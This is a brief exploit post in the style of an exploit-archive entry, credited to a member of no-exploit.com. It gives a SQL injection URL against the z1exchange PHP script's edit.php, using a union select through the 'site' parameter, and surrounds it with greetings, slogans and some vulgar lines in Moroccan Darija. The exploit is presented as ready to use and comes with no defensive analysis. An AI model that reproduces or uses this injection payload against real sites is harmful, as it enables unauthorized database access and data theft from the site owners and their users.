  --          JIKO FroM No-exploit.Com        ---
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-exploit.Com
# Script  : z1exchange-->http://1scripts.net/scripts/z1exchange.zip
 Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM  , WwW.Exploiter5.CoM
Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira
=========================[JAWAD Cha7ta 4 ever]===================
# Exploit  :



http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

=========================[Thanks To Allah ]===================
 greetz : all my friend and all No-exploit members and
 $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $
MizoZ $ leopard
 all muslims
 visit: www.no-exploit.Com
 Visit: My-montada.Co.cc For your free Forum
  --          JIKO FroM No-exploit.Com        ---
------==        troops of Mohamed comming inchalah     =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta
++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]        ++